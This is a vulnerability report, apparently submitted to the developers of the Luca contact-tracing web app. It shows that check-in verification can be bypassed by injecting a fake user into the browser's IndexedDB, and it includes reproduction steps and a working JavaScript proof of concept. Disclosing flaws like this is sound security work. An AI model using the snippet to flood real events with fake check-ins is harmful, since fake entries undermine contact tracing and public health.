Fake Checkin without TAN possible
It's possible to check in to an event without entering any details on the webapp. The whole registration process can be circumvented by directly changing entries in the indexedDB of the browser. This poses a massive problem as a malicious user can automate this process and populate an event with lots of fake data.
Using a selenium script, I was able to add 50 fake people to a private event (I created myself) within a couple of minutes.
If it's not clear already, the problem with lots of fake data is that it makes tracing actual key contacts infeasible or at least very time-consuming.
Steps to reproduce manually
- Get the meeting link from a QR code: e.g.
https://app.luca-app.de/webapp/meeting/7dbb0796-c474-4c7b-baf3-dccb3ea233b0#eyJmbiI2ImV0r5QiLCJsbiI6InQifQ==
(called Meeting_Link in the following) - Go to the Website referred to by the Meeting_Link
- you should now arrive at a page where you are prompted to accept the terms and conditions, etc.
- Execute a snippet similar to the one below to populate a fake user.
- Enter the Meeting_Link in the url-bar and hit enter.
- You'll now be checked in to the meeting as the fake user you just populated.
The following code is meant as a proof of concept. It was tested on Firefox(78.9.0esr) and Chrome(89.0.4389.114).
The basis for the snippet was taken from this article (https://developer.chrome.com/docs/devtools/storage/indexeddb/).
let request = indexedDB.open('luca', 33);
request.onsuccess = function(e) {
let db = e.target.result;
let trans = db.transaction(["users"], "readwrite");
let userObjectStore = trans.objectStore('users');
// Create a fake user
const user = {
firstName:'Alice',
lastName:'Carter',
version: '3', phoneNumber: '0123999445', email: '',
street:'jasonstreet', city:'jennigton', houseNumber:'10', zip:'zippy',
userId:"1d7b4f55-5772-4bff-b9ea-9dc564836126"
}
// Clear db to get rid of current user
userObjectStore.clear()
// Add fake user to the db
let request1 = userObjectStore.put(user);
request1.onsuccess = function(e) {
console.log('Added user');
};
}
If you have any questions or need more evidence. Let me know.